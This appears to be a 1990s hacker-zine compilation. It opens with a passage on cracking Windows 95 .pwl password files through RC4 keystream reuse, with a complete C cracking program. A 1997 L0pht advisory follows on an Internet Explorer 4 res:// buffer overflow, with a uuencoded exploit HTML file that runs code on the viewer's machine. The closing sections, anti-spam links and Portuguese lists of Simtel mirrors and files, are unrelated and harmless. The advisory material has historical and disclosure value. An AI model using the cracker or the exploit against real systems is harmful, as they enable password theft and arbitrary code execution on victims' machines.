known plaintext attack as the 20 first bytes are completely predictable.

The 20 first bytes of any .pwl files contains the username, which

is the same as the filename, in capitals, padded with 0x00. From then I
wrote a program to bruteforce the .pwl file and optimized it so it would
run in less than 24 hours on an SGI. I run a test of the bruter software
and recovered an unknown rc4 key in 8 hours, but the decrypted file was
still largely uninteligeble, I then proceeded to decrypt the file at all
possible starting points, and discovered valuable information (cleartext
passwords) offset in the file.

This has enormous implications: RC4 is a stream cipher, it generates a long
pseudo random stream that it uses to XOR the data byte by byte. This isn't
neccecaraly weak encryption if you don't use the same stream twice: however
WIN95 does, every resource is XORed with the same pseudo random stream.
What's more the 20 first bytes are easy to guess. This is easy to exploit:
XOR the 20 bytes starting at position 0x208 with the user name in
uppercase, and slide this string through the rest of the file (xoring it
with whatever is there) this reveals the 20 first bytes of the different
resources.

>From there I went on to study the structure of the .pwl file it is

something like this (decrypted):

USERNAME.........wpwpwpwpwpwpwpwpwpwp

rs???????

rs

rs

rs???????????

rs???????

where wp is i word pointer to the different resources (from start of pwl
file) The 2 first bytes of the resource (rs) is its length in bytes (of
course XOR with RC4 output) It is the fairly easy to find all the resource
pointers by jumping from start of resource to next resource, had it not
been for the fact that the size sometimes is incorrect (courtesy of M$)

What follows is a short c program that tries to remedy this and reconstruct
the pointertable thus generating at least 54 bytes of the RC4 pseudorandom
stream, and then proceedes to decrypt as much as possible from the
different resources. What does this show? Although RC4 is a fairly strong
cipher, it has the

same limitations as any XOR streamcipher, and implementing it without
sufficient knowledge can have dire consequences. I strongly suggest that
the programmers at Microsoft do their homework before trying anything like
this again!

DISCLAIMER:

This is a quick hack, I don't make any claims about usefulness for any
purpose, nor do I take responsibility for use nor consequences of use of
the software. FUNCOM of Norway is not responsible for any of this, (I speak
for myself, and let others speak for themselves) This source is hereby
placed in the public domain, please improve if you can.

- --- glide.c ---

#include <stdio.h>

#include <string.h>

unsigned char Data[100001];

unsigned char keystream[1001];

int Rpoint[300];

main (int argc,char *argv[]) {

FILE *fd;

int i,j,k;

int size;

char ch;

char *name;

int cracked;

int sizemask;

int maxr;

int rsz;

int pos;

int Rall[300]; /* resource allocation table */

if (argc<2) {

printf("usage: glide filename (username)");

exit(1);

}

/* read PWL file */

fd=fopen(argv[1],"rb");

if(fd==NULL) {

printf("can't open file %s",argv[2]);

exit(1);

}

size=0;

while(!feof(fd)) {

Data[size++]=fgetc(fd);

}

size--;

fclose(fd);

/* find username */

name=argv[1];

if(argc>2) name=argv[2];

printf("Username: %s\n",name);

/* copy encrypted text into keystream */

cracked=size-0x0208;

if(cracked<0) cracked=0;

if(cracked>1000) cracked=1000;

memcpy(keystream,Data+0x208,cracked );

/* generate 20 bytes of keystream */

for(i=0;i<20;i++) {

ch=toupper(name[i]);

if(ch==0) break;

if(ch=='.') break;

keystream[i]^=ch;

};

cracked=20;

/* find allocated resources */

sizemask=keystream[0]+(keystream[1]<<8);

printf("Sizemask: %04X\n",sizemask);

for(i=0;i<256;i++) Rall[i]=0;

maxr=0;

for(i=0x108;i<0x208;i++) {

if(Data[i]!=0xff) {

Rall[Data[i]]++;

if (Data[i]>maxr) maxr=Data[i];

}

}

maxr=(((maxr/16)+1)*16); /* resource pointer table size

appears to be

divisible by 16 */

/* search after resources */

Rpoint[0]=0x0208+2*maxr+20+2; /* first resource */

for(i=0;i<maxr;i++) {

/* find size of current resource */

pos=Rpoint[i];

rsz=Data[pos]+(Data[pos+1]<<8);

rsz^=sizemask;

printf("Analyzing block with size:

%04x\t(%d:%d)\n",rsz,i,Rall[i]);

if( (Rall[i]==0) && (rsz!=0) ) {

printf("unused resource has nonzero size !!!\n");

exit(0);

}

pos+=rsz;

/* Resources have a tendency to have the wrong size for

some reason */

/* check for correct size */

if(i<maxr-1) {

while(Data[pos+3]!=keystream[1]) {

printf(":(%02x)",Data[pos+3]);

pos+=2; /* very rude may fail */

}

}

pos+=2; /* include pointer in size */

Rpoint[i+1]=pos;

}

Rpoint[maxr]=size;

/* insert Table data into keystream */

for(i=0;i <= maxr;i++) {

keystream[20+2*i]^=Rpoint[i] & 0x00ff;

keystream[21+2*i]^=(Rpoint[i] >> 8) & 0x00ff;

}

cracked+=maxr*2+2;

printf("%d bytes of keystream recovered\n",cracked);

/* decrypt resources */

for(i=0;i < maxr;i++) {

rsz=Rpoint[i+1]-Rpoint[i];

if (rsz>cracked) rsz=cracked;

printf("Resource[%d] (%d)\n",i,rsz);

for(j=0;j<rsz;j++) printf("%c",Data[Rpoint[i]+j]^keystream[j]);

printf("\n");

}

exit(0);

}

- --- end ---

#include <std/disclaimer.h>

E3D2BCADBEF8C82F A5891D2B6730EA1B PGPencrypted mail preferred, finger for
key

* * * * * * * * * * * * * * * * * * * *

_______________________________________________________________

       Document: L0pht Security Advisory

    URL Origin:  http://l0pht.com/advisories.html
  Release Date:  November 1st, 1997
   Application:  Microsoft Internet Explorer 4.0 Suite
      Severity:  Viewing remote HTML content can execute arbitrary native code
        Author:  dildog@l0pht.com
 Operating Sys:  Windows 95

-------------------------------------------------------------------------------

 ========
 Scenario
 ========

  The Microsoft Internet Explorer 4.0 Suite, including all programs supplied
  with it that read and/or process HTML from either local machines, intranet
  machines, or remote internet machines are subject to a buffer overflow in the
  HTML decoding process. The buffer overflow can cause the application to page
  fault, or in the worst case, execute arbitrary precompiled native code.

 =======
 Example
 =======

  1. Copy the supplied HTML file(s) into a location that is accessible via the
     target application.
  2. Point to it. Look at it.
  3. Click on the link. (or let someone click it for you)
  4. Become aware of what happens to your machine.
  5. Freak out and beg Microsoft to make the bad man stop.

 =================
 Technical Details
 =================

  The problem here lies in the deciphering of the URL line format itself. The
  base HTML library that is used by the Internet Explorer 4.0 Suite and the
  following programs are vulnerable:

        - Outlook Express (both mail and news)
        - Windows Explorer
        - Internet Explorer (different than regular explorer, really)

  This problem, because it stems from a programming flaw in the HTML decoding
  system, is unaffected by the Explorer "Security Zones" feature. In other
  words, if you turn on the highest security level for the zone from where the
  exploit HTML is being viewed, you are still vulnerable.

  The critical problem here is a buffer overflow in the parsing of a particular
  new type of URL protocol. The "res://" type of URL is meant to allow access
  to a local resource embedded in a local DLL file. This is useful for
  archiving entire websites into a DLL and is not, in its truest concept, a
  security flaw.

  For example, to read something out of the IE4.0 Tour (stored in a DLL) try
  the following URL: res://ie4tour.dll/page1-6.htm

  The buffer overflow is on the actual filename specified. To crash your
  machine go ahead and try res://blahblahblah ... blahblah/ in your Internet
  Explorer window where the amount of 'blah' equals 265 characters.

  The function that goes through the filename and validates it is flawed on
  Windows 95. Without checking the length, the filename is uppercased,
  concatenated with '.DLL' if it isn't there already, and in the process,
  copied into a fixed size buffer.

 ========
 Solution
 ========

  Currently, there is no solution available for this flaw. You can't set any
  Internet Explorer options to avoid it, and you are not protected by any
  level of zone security. Simply don't surf the web, read email or view
  net news using Internet Explorer 4.0 until Microsoft puts up a hotfix.

 ============
 Exploit Code
 ============

    Here we go...
    When constructing the exploit we want to try something useful.
    Lets's start with appending text of your choice to AUTOEXEC.BAT...
    (note that running native code lets you do pretty much anything you want)

    Note that the location of the exploit string in the stack is very important
    and it varies from target application to target application.

    Constructing the exploit string:
    Figure out stack location for exploit code...

        App                     Loc
        Internet Explorer       0x0057C144
        Windows Explorer        0x0088A0F4
        ...

    Yeah, I know that those locations have null bytes in them and you can't
    put those (or lowercase letters, or CR/LF or 0x07 or anything like that)
    in the exploit string... but we'll let microsoft fix that for us. Step thru
    the process to see IE add that extra null character for you. Will they
    ever cease to amaze...

    Put together what you wanna do, tack on the necessary jump addresses and
    all that. That's it.

And now, UUENCODED to preserve freshness:

*************************************************************************
* MAKE SURE YOU RUN THIS EXPLOIT WITH __INTERNET__ EXPLORER, _NOT_      *
* REGULAR OL' WINDOWS EXPLORER. (put it on a website and download it or *
* click on the IE desktop icon (run iexplore.exe) and type in the name  *
* of the file into the URL line)  IT WON'T WORK OTHERWISE!!!!           *
*                                (though it could be made to do so)     *
*************************************************************************

----====/ SNIP

section 1 of uuencode 5.20 of file infect.htm    by R.E.M.

begin 644 infect.htm
M/&AT;6P^#0H\:&5A9#X-"CQT:71L93X-"DEN=&5R;F5T($5X<&QO:71E<@T*
M/"]T:71L93X-"CPO:&5A9#X-"CQB;V1Y(&)G8V]L;W(](T9&1D9&1B!T97AT
M/2,P,#`P,#`^#0H-"CQC96YT97(^#0H\:#$^5VAA="!D;R!)('=A;G0@=&\@
M:6YF96-T('1O9&%Y/SPO:#$^#0H-"D-L:6-K(&AE<F4@=&\@;6]D:69Y(&%U
M=&]E>&5C+F)A=#QP/@T*#0H\82!H<F5F/2(-"G)E<SHO+[C$0=B`+8"`@("0
MD)"0D)"+V#/)@,&J`]FQ7XH3@.)_B!-#XO:0D)"0D%"0D&H"D)"0NNW"6`&!
MZ@$!`0&04KNW\O>_@.^`_]-:6E"0D#/;LP)3@^L$4U"[X(#YO__3@^P,D%A0
M,]NS.5.[#-+G$('K$!"0$%-0N[#*^;__TX/$#)"0D)"[SX#YO__3D)"0N["O
M^+__TY"0D,S,+2TM+2TM+2TM+2TM+4,Z7$%55$]%6$5#+D)!5("-BD5#2$\@
M34E#4D\D3T94(#!73EH@64]5+BXN(%)%4$5.5"!!3D0@0D4@4T%6140AC8I0
M055318V*@"TM+2TM+2TM+2TM+2TM+2U!04%!0D)"0D,!(+Z_1$1$143!5R\-
M"B(^#0H\9F]N="!F86-E/2)7:6YG9&EN9W,B('-I>F4]*S8^_SPO9F]N=#X\
M9F]N="!S:7IE/2LV/CT\+V9O;G0^/&9O;G0@9F%C93TB5VEN9V1I;F=S(B!S
M:7IE/2LV/B9G=#PO9F]N=#X-"CPO83X-"@T*/"]C96YT97(^#0H-"CPO8F]D
->3X-"CPO:'1M;#X-"CX-
`
end
sum -r/size 62455/917 section (from "begin" to "end")
sum -r/size 5779/643 entire input file

/====---- SNIP

A haiku:

 Microsoft IE
 Is there no security?
 Not if you ask me.

dildog@l0pht.com (11/1/97)

-------------------------------------------------------------------------------

For more L0pht (that's L - zero - P - H - T) advisories check out:
http://l0pht.com/advisories.html

---------------------------------------------------------------------------

ANTI-SPAM SOFTWARE

http://members.aol.com/macabrus/utilities.html

http://rs.internic.net/cgi-bin/whois          Whois

http://www.net.cmu.edu/bin/traceroute      Traceroute

http://www.anonymizer.com/                  Anonymizer

http://bogong.acci.com.au/~jon/agis/index.html   Lotsa Spam-Fighting Tools

http://www.netusa.net/~eli/filtering.html              Newsgroup Moderation
Software

http://www.jazzie.com/ii/internet/procmail/        Infinite  Ink's Procmail

http://www.nepean.uws.edu.au:80/users/david/pe/blockmail.html   Blocking
 Email

http://www.acm.uiuc.edu/workshops/procmail/                     Procmail
Workshop

http://www.jazzie.com/ii/internet/mailbots.html       Mailbots

http://www.netusa.net/~eli/faqs/addressing.html     Email Addressing FAQ

http://www.jazzie.com/ii/faqs/archive/mail/filtering-faq          Mail
Filtering FAQ

http://www-ucsee.eecs.berkeley.edu/~set/spam    More Email Filtering

ftp://ftp.informatik.rwth-aachen.de/pub/packages/procmail        Procmail
FTP

http://www-users.informatik.rwth-aachen.de/~berg/archive/ procmail/
Procmail Archive

http://www.panix.com/e-spam.html                       Panix Email
Resources

http://www.cis.ohio-state.edu/hypertext/faq/usenet/mail/
filtering-faq/faq.html   Another

Mail Filtering FAQ

http://kryten.eng.monash.edu.au/gspam.html     Help Deciphering Headers

http://digital.net/~gandalf/spamfaq.html         Header Deciphering

---------------------------------------------------------------------------

Paginas Juridicas

Jus Navigandi (Pagina Juridica) --> http://www.geocities.com/Paris/1997

---------------------------------------------------------------------------

O PARAÍSO CHAMADO SIMTEL

Muitos nao conhecem um verdadeiro paraiso, na forma de software shareware,
gratuito ou coisa do genero, disponivel nos chamados "mirror" dos
Simtelnet, um dos mais antigos repositorios de software na rede internet. A
vantagem, comparada com grandes sites www como www.shareware.com ou
www.download.com e que e relativamente facil achar o que se que e ate o que
nao se quer, nos indices.. Essa dica e meio de velha guarda, a maioria dos
"velhos" fucadores comecou la (eu, por exemplo). Mas quem nao sabe, pode
procurar que acha coisa interessante. Sem virus.

| Australia/1 | Australia/2 | Austria | Brazil/1 | Brazil/2 | Bulgaria |
| Canada | Czech Republic | Finland | Germany/1 | Germany/2 | Hungary |
| Ireland | Israel | Italy | Korea | Norway | Romania | Slovakia |
| Slovenia | South Africa/1 | South Africa/2 | Switzerland |
| UK/1 | UK/2 | USA/1 | USA/2 | USA/3 | USA/4 |

Abaixo, o URL (igonorar o -------> na hora de digitar)

http://www.iniaccess.net.au/simtel.net/ ------>Australia/1

http://ftp.tas.gov.au/simtel.net/ ------>Australia/2

http://www.univie.ac.at/simtel.net/ ------>Austria

http://ftp.unicamp.br/simtel.net/ ------>Brazil/1

http://simtel.correionet.com.br/simtel.net/ ------>Brazil/2

http://www.eunet.bg/simtel.net/ ------>Bulgaria
http://mirror.direct.ca/simtel.net/ ------>Canada

http://pub.vse.cz/simtel.net/ ------>Czech Republic

http://ftp.funet.fi/mirrors/simtel.net/ ------>Finland

http://www.tu-chemnitz.de/HOME/fischer/simtel.net/ ------>Germany/1

http://www.ruhr-uni-bochum.de/simtel.net/ ------>Germany/2

http://www.simtel.iif.hu/ Hungary
http://www.hea.ie/simtel.net/ ------>Ireland

http://www.cs.huji.ac.il/simtel.net/ ------>Israel

http://serviceftp.flashnet.it/simtel.net/ ------>Italy

http://www.iWorld.net/simtel.net/ ------>Korea

http://archive.bitcon.no/simtel.net/ ------>Norway

http://www.sorostm.ro/simtel.net/ ------>Romania

http://ftp.uakom.sk/simtel.net/ ------>Slovakia
http://ftp.arnes.si/simtel.net/ ------>Slovenia

http://simtel.saix.net/ South Africa/1

http://simtelnet.is.co.za/ South Africa/2

http://sunsite.cnlab-switch.ch/simtel.net/ ------>Switzerland
http://ftp.globalnet.co.uk/simtel.net/ ------>UK/1

http://micros.hensa.ac.uk/+misc/simtel.net/ ------>UK/2

http://www.simtel.net/simtel.net/ ------>USA/1

http://oak.oakland.edu/simtel.net/ ------>USA/2

http://ftp.epix.net/simtel.net/ ------>USA/3

http://download.romt.com/simtel.net/ ------>USA/4

Para dar um exemplo do que se pode achar la, vejamos a lista abaixo
(escolhida do subdiretorio pub/simtel.net/msdos/info) Ah, sim. E'  preciso
lembrar que estou pensando no pessoal que programa e quer aprender a mexer
com computador ao escolher esta lista e nao no pessoal que le uma das
internet-nao-o-que da vida que so quer e brinquedinho..:

  asm9709h.zip  (970923)  65K  Sep 97 x86 Assembly Language FAQ, HTML format
  asm9709t.zip  (970923)  54K  Sep 97 x86 Assembly Language FAQ, text format
  asp804.zip    (961030) 381K  Association of ShareWare Professionals catalog
  aspdat71.zip  (970131)  60K  ASP membership list and info in DBF format
  author35.zip  (960407)  40K  List of MS-DOS PD & SW author e-mail addresses
  bbstip12.zip  (920808)   5K  Effective Shareware distribution via the BBS
  bestpr54.zip  (970212)  26K  Timo's choice of best MS-DOS/Win PD/FW/SW pgms
  bgi20.zip     (960522) 375K  Computer-based Internet tutorial for beginners
  biosdos.zip   (870813)  24K  List of BIOS error codes and what they mean
  bkache56.zip  (921203) 173K  Tutorial discusses back pain relief
  calfaq.zip    (960904)  20K  Frequently asked questions about calendars
  chap32.zip    (890715)  16K  Brief summary of copyright laws
  cnd7301.zip   (940103)  71K  ASP ShareWare authors quick-lookup catalog
  com3com4.txt  (910131)   5K  Notes on using COMM ports 3 and 4
  config.zip    (870124)  13K  How to setup CONFIG.SYS & AUTOEXEC.BAT
  copro16a.zip  (940925)  73K  Article on numeric coprocessors for PCs
  cpucmp14.zip  (930613)  12K  Perf. comparison 386DX/38600DX/486DLC/RapidCAD
  dcc9224.zip   (921002) 129K  List of over 1,000 computer clubs nationwide
  devdriv.zip   (851107)   3K  Tutorial on DOS device drivers
  diagtxt.zip   (861212)  10K  PC error diagnosis and memory error list
  disk-art.zip  (890609)  22K  Articles discussing disks by Steve Gibson
  dos32v4.zip   (860517)   4K  Patches to MS-DOS version 3.2
  dosfv206.zip  (960331)  56K  FAQ from comp.os.msdos.programmer newsgroup
  doshlp20.zip  (950624) 523K  DOSHelp v2.0: Basic DOS Commands Tutor
  dosimp10.zip  (910811) 253K  New DOS 5.0 tutorial, for new and oldtimers
  dosmnual.zip  (870222)  10K  DOS manual for beginners. Printable
  dosref33.zip  (940120) 282K  List of interrupts, memory locations, IO ports
  dostips.zip   (871214)  12K  Helpful hints on some DOS functions
  dostips1.zip  (851125)  65K  DOS tips from various magazines - part 1 of 6
  dostips2.zip  (851125)  58K  DOS tips from various magazines - part 2 of 6
  dostips3.zip  (851125)  45K  DOS tips from various magazines - part 3 of 6
  dostips4.zip  (860629)  59K  DOS tips from various magazines - part 4 of 6
  dostips5.zip  (871018)  60K  DOS tips from various magazines - part 5 of 6
  dostips6.zip  (870405)  43K  DOS tips from various magazines - part 6 of 6
  dostutor.zip  (860405)  94K  Learn MS-DOS - an interactive tutorial
  drdostip.zip  (920101)  62K  DR DOS 6.0 Tech Tips (1/2/92) from DRI BBS
  dtarev1.zip   (890118)  17K  Review of SpinRite & Disk Technician Advanced
  emailadr.zip  (930828)  20K  Baker's PC Industry E-mail address listing
  emailgui.zip  (910104)   6K  How to send E-Mail from one network to another
  ext_ram.zip   (890516)   5K  Good discusion of extended vs expanded RAM
  faqc9709.zip  (970928) 106K  Frequently Asked Questions of comp.compression
  faqclp.zip    (960226)  13K  Frequently Asked Questions of comp.lang.pascal
  faqclpb.zip   (960422)   8K  comp.lang.pascal.borland newsgroup Mini-FAQ
  ftp-list.zip  (970506) 410K  List of Internet sites with FTP & mail access
  ftp2uk23.zip  (920409)   8K  Unix scripts (2) for JANET FT-RELAY
  ftpgrep.zip   (940419)   1K  Perl script: Search ftp-list w/regular expr.
  gameport.inf  (900519)   3K  How to: read game port, schematic, hookup info
  geozone4.zip  (940830)   5K  Internet address two-letter country codes list
  glos2.zip     (900225)  63K  Glossary of Telecomputing terms
  inter55a.zip  (970928) 353K  Comprehensive list of interrupt calls, 1of4
  inter55b.zip  (970928) 353K  Comprehensive list of interrupt calls, 2of4
  inter55c.zip  (970928) 353K  Comprehensive list of interrupt calls, 3of4
  inter55d.zip  (970928) 506K  Comprehensive list of interrupt calls, 4of4
  inter55e.zip  (970928) 273K  Utility programs for interrupt list
  inter55f.zip  (970928) 214K  WinHelp hypertext conversion programs
  inthlp10.zip  (941111)  53K  Interrupt Helper: Viewer for interrupt list
  intshare.zip  (910805)   6K  Info on software interrupt-sharing protocol
  intwin54.zip  (970630) 4.2M  R.B.'s Interrupt List 54, Windows Help format
  intwin55.zip  (970930) 4.2M  Interrupt List 55, Windows Help format
  ip_hook.zip   (910326)  30K  Information on hooking up a PC to the Internet
  jarg300a.zip  (930728) 467K  Jargon-File 3.0.0 (Hacker's Dictionary), ASCII
  jarg300n.zip  (940303) 521K  Jargon-File 3.0.0 (Hacker's Dictionary), NG
  laptut58.zip  (921205) 228K  Laptop Tutorial, tips/tricks for laptop users
  maxcat.zip    (930910) 447K  Catalog of over 600 ShareWare programs
  mdive5a.zip   (960428)  30K  Heart attack risk assessment program
  mf2.zip       (901215)   2K  TSR shows program's memory usage while running
  mkdata.zip    (940914)  60K  1000 Internet email,telnet,ftp,gopher,WWW,URLs
  moder62.zip   (971018)  29K  List of MS-DOS FTP sites and their moderators
  modwks20.zip  (950107) 140K  Modem Workshop v2.0: Modem book on disk
  mrdos231.zip  (900105) 147K  DOS tutorial, beginner to hard disk, text/quiz
  muf17.zip     (960407)  64K  MicroSoft's Undocumented Features, Vol 1, No 7
  newlaw.zip    (901002)   3K  New copyright legislation, shareware problems
  nos2.zip      (970324) 957K  The Prophecies of Nostradamus v2.0
  nulcable.zip  (910118)   3K  How to make serial/parallel null modem cables
  packftp.zip   (941223) 450K  Anonymous FTP Sitelist conversion program
  pccdemo.zip   (931219) 577K  PC Complete disk magazine, issues 1 and 2
  pcgpe10.zip   (960628) 701K  The PC Games Programmers Encyclopedia 1.0
  pcl60a.zip    (960612) 223K  Pc-Learn: Beginners Computer Tutorial, 1 of 2
  pcl60b.zip    (960612) 200K  Pc-Learn: Beginners Computer Tutorial, 2 of 2
  psychek2.zip  (950527)  25K  Find out your management/personality style
  pwrwds23.zip  (960722) 227K  Power words: 4,500 wise and witty quotations
  redirect.zip  (900817)   9K  Advanced DOS tips on rerouting, piping, edlin
  relative.zip  (871201)   2K  Graphs relative speed of CPU
  res16sw.zip   (950503) 1.2M  Monitor repair procedure database. ShareWare
  rstutor.zip   (881104)  96K  Tutor for communications, serial interface
  rurarj.zip    (970711)  11K  RURARJ: Arj compression command set
  sut56.zip     (920705)  44K  Tutorial on how to use and enjoy Shareware
  tsfaqp38.zip  (971113) 123K  Common Turbo Pascal questions & Timo's answers
  useful35.zip  (940508)  26K  Useful MS-DOS programs at Simtel.Net and Garbo
  zen10.zip     (920630)  65K  Jun 1992 Zen and the Art of the Internet


Esta outra lista vem do subdiretorio simtel.net/msdos/c (para quem quer
aprender a linguagem C e fazer coisas interessantes):

    Filename      Date   Size  Description
  actlib17.zip  (931025)  86K  General purpose libs w/source for C/C++ pgmers
  advc11.zip    (870423)   9K  Thomas Hanlin's advanced 'C' routines. v.1.1
  asynlib2.zip  (910320)  17K  ASYNC communications library callable from 'C'
  bestl232.zip  (940912) 323K  Extensive C programmer's library (FreeWare)
  bin2c.zip     (960903)   9K  Convert a binary file to a C structure
  bituudec.c    (871224)   7K  MSDOS/VMS UUdecode fixes lost trailing spaces
  bltc127.zip   (961115) 220K  Bullet C/C++ 16-bit btree/DBF database engine
  bmp2cp11.zip  (970920)  23K  BMP file to C/C++ source file converter
  btoa.zip      (890124)   4K  'C' source for binary-to-ascii convert pgm
  bullet25.zip  (970702) 895K  Database engine for DOS32,Win32s,Win95,NT,OS/2
  c--final.zip  (961128) 640K  Sphinx C--: Compiler, examples & source
  c-eval.zip    (930423)  21K  C source to evaluate mathematical expressions
  c-flow.zip    (850624)  43K  Display flow of 'C' programs
  c4window.zip  (850806)  32K  Window routines for 'C' programs
  c60probs.zip  (900617)   6K  List of problems found with MS C v6.0
  cacoph10.zip  (940419)   7K  PC speaker music library for Turbo C and C++
  calendah.zip  (970124)   9K  ANSI C source for calendar calculations
  cbase102.zip  (910922) 267K  C routines for database applications, w/docs
  cbooks.zip    (890629)   9K  List of currently available C language books
  cc01.zip      (850828)   3K  'C' language functions and programs - 1 of 4
  cc02.zip      (860103)  65K  'C' language functions and programs - 2 of 4
  cc03.zip      (860103)  81K  'C' language functions and programs - 3 of 4
  cc04.zip      (851125)  78K  'C' language functions and programs - 4 of 4
  ccc1053a.zip  (891224)  26K  Complete C: learn/experiment w/OO systems,1of3
  ccc1053b.zip  (891224) 217K  Complete C: learn/experiment w/OO systems,2of3
  ccc1053c.zip  (891224) 293K  Complete C: learn/experiment w/OO systems,3of3
  ccdl151e.zip  (970704) 423K  32 bit C compiler for DOS/DPMI
  ccdl151l.zip  (970704) 443K  32 bit C compiler run time library
  ccdl151s.zip  (970704) 219K  32 bit C compiler sources
  ccompile.zip  (850605)  35K  Small 'C' compiler
  cdecl.zip     (871020)  11K  Decomposes 'C' language declarations
  cephes25.zip  (960913) 600K  Mathematical function library in C language
  cfgop110.zip  (950802)  48K  I/O for Windows type INI/CFG files. (C source)
  cfog102.zip   (950501)  52K  C source code obfuscator
  cgazv5n3.zip  (910507)  44K  Code from the C Gazette - Spring 1991 issue
  cl_7_bug.zip  (921008)  17K  Bug examples for Microsoft C-Compiler CL-7.00
  cm100exe.zip  (911115)  51K  MAKE for MSC/WIN SDK (exe and samples), 1of4
  cm100hlp.zip  (911115) 109K  MAKE for MSC/WIN SDK (QuickHelp), 2of4
  cm100txt.zip  (911115)  49K  MAKE for MSC/WIN SDK (Help: text format), 3of4
  cmake100.zip  (911115)   1K  MAKE for MSC/WIN SDK (description), 4of4
  cnews001.zip  (880622)   6K  Issue #1 'C' programmer's newsletter
  cnews002.zip  (880622)   5K  Issue #2 'C' programmer's newsletter
  cnews003.zip  (880205)  20K  Issue #3 'C' programmer's newsletter
  cnews004.zip  (880221)  42K  Issue #4 'C' programmer's newsletter
  cnews005.zip  (880307)  70K  Issue #5 'C' programmer's newsletter
  cnews006.zip  (880410)  28K  Issue #6 'C' programmer's newsletter
  cnews007.zip  (880529)   9K  Issue #7 'C' programmer's newsletter
  cnews008.zip  (880614)  57K  Issue #8 'C' programmer's newsletter
  cnews009.zip  (880717)  64K  Issue #9 'C' programmer's newsletter
  cnews010.zip  (880815)  49K  Issue #10 'C' programmer's newsletter
  cnews011.zip  (880909)  30K  Issue #11 'C' programmer's newsletter
  cnews012.zip  (881030)  12K  'C' programming & compiler review #12
  cnews013.zip  (881227)  37K  'C' Elec. Newsletter/Journal Vol 2 #13
  cnews014.zip  (890222)  62K  'C' Elec. Newsletter/Journal Vol 2 #14
  cnews015.zip  (890704)  24K  'C' Elec. Newsletter/Journal Vol 2 #15
  cnews016.zip  (890726)  56K  'C' Elec. Newsletter/Journal Vol 2 #16
  cnews017.zip  (890924)  16K  'C' Elec. Newsletter/Journal Vol 2 #17
  cnews018.zip  (891228)  39K  'C' Elec. Newsletter/Journal Vol 2 #18
  cnews019.zip  (900804)  28K  'C' Elec. Newsletter/Journal Vol 2 #19
  commasm.zip   (880713)   7K  Info for programming MS-DOS COMM ports
  configf.zip   (950430)   2K  Use Windows-like config files in C (w/src)
  conio.zip     (870608)   8K  Direct console I/O ASM routines for MicrosoftC
  consl10.zip   (950930) 122K  Console text output 16/32 bit C/C++ library
  consl11.zip   (960616)  94K  Console text output 16/32 bit C/C++ library
  cp14.zip      (920319)  25K  C code outliner (DDJ8808, tweaked for BC++2.0)
  cpc2.zip      (960121) 138K  CodePrint for C/C++ Version 2.02 Jan 1996
  cprot217.zip  (920614) 102K  C and C++ incremental prototypes extractor
  crc-c.zip     (870729)   4K  CRC routines for C
  crnchr22.zip  (930412)  67K  C Libs - FFT,Wavelet,Coherence,Filter,Regr.etc
  gencsrc.zip   (871120)  90K  Coronado's Generic 'C' tutor v2.0, (1 of 2)
  genctxt.zip   (871120) 105K  Coronado's Generic 'C' tutor v2.0, (2 of 2)
  mc302pc1.zip  (940318) 190K  MICRO-C PC 'C' compiler v3.02
  miracle.zip   (961205) 268K  Miracle C Compiler v1.7
  t2c.zip       (871201) 100K  Microsoft's Turbo Pascal to C translator
  zcc096.zip    (961104) 245K  Small C compiler, assembler and linker for DOS

Tem muita coisa em C, tentei selecionar acima, mas foi impossivel..
imagine C++ entao..

  cptuts22.zip  (920119)  75K  Coronodo C++ Tutorial: Source examples, 1/2
  cptutt22.zip  (920119) 105K  Coronodo C++ Tutorial: Tutorial text files 2/2
  cslib211.zip  (970520) 793K  Database library for C++ developers
  dos_win1.zip  (940709) 186K  Windows-like GUI for DOS. BC++ 3.1 source code
  jptui4db.zip  (971115) 705K  Textual user interface for Borland C++ 4.x
  knowhow4.zip  (950120) 574K  Borland C++ SDK, DOS, source codes. GUI + more
  memman2c.zip  (950316)  45K  XMS/EMS/Virtual *Flat* Memory for C++/C
  newmat09.zip  (971013) 169K  C++ classes for matrix manipulation
  objeas3a.zip  (940829) 502K  Graphic/text user interface C++ library, 1of2
  objeas3b.zip  (940829) 238K  Graphic/text user interface C++ library, 2of2
  prnstr15.zip  (951023)  21K  Printer Stream Lib for Borland C++ programmers
  sdesg10b.zip  (950904)  77K  Sprite Designer for XLIB, c++ for sprite lib.
  serial_1.zip  (900513)   4K  C++ source code routines for serial ports
  tsr100je.zip  (930320)  70K  TSR class for Borland C++ (with source)

No simtel.net/msdos/sysutils pode-se por exemplo, encontrar emuladores de UNIX pra
DOS e outros baratos (todas as listas estao incompletas).

  autocmos.zip  (940922)   2K  CMOS memory read/write/auto repair utility
  dos94-01.zip  (961023) 490K  Windows 95 style utility menu for DOS
  fcii_2_1.zip  (891216)  81K  File Commando v2.1, a PC Tools clone, 1 of 3
  fcii_2_2.zip  (891216)  88K  File Commando v2.1, a PC Tools clone, 2 of 3
  fcii_2_3.zip  (891209)  73K  File Commando v2.1, a PC Tools clone, 3 of 3
  irqr.zip      (880422)   4K  Report status of IRQ channels,w/TP4 & MS C src
  is_con10.zip  (911220)   3K  Report if handle is associated with console
  jbalarm.zip   (910617)  22K  Alarm/reminder w/multiple sounds. Works w/WIN3
  jcfg100.zip   (961122)  18K  Assigns/swaps 'dummy' drive letters
  jobs32.zip    (890415)   7K  JOBS v3.20 - DOS shell/Disk manager, 1 of 3
  jobs32a1.zip  (890415) 125K  JOBS v3.20 - DOS shell/Disk manager, 2 of 3
  jobs32a2.zip  (890415) 127K  JOBS v3.20 - DOS shell/Disk manager, 3 of 3
  portfix.zip   (960312)  15K  Fixes SMC super I/O port lockup on 486/Pentium
  porttool.zip  (930112) 173K  16 Unix-like tools ported to MS-DOS
  sil2.zip      (851013)   6K  Silence PC speaker
  silence.zip   (851231)   3K  Turns PC speaker on and off
  siren.zip     (891205)   7K  Make siren sounds on PC speaker
  skey40.zip    (911223) 325K  Keystroke emulation and batch file utilities
  sysfs10.zip   (970620)  65K  System File Save: Backup/restore system files
  tstsr21.zip   (960810)  97K  TSR pgms noboot/reslock/timedown/timeup, etc.
  ud16_v33.zip  (971110) 4.2M  All 62+ Unix 32-bit utilities for MS-DOS
  undoc2eh.zip  (890108)   2K  Demo of undocumented interrupt service 2Eh
  uptime.zip    (910119)   2K  Time in days/hours/mins/secs since system boot
  uptimer.zip   (961022)   5K  System timer update from real-time clock
  util1.zip     (951024) 123K  A group of utilities for MS-DOS
  utils1.zip    (890727)   2K  Misc. utilities by E. Miller
  utl115.zip    (960405) 168K  Utilities with file viewer and printer support
  uxutl23a.zip  (960226) 238K  Unix-like utilities for DOS. Rel 2.3. 1of4
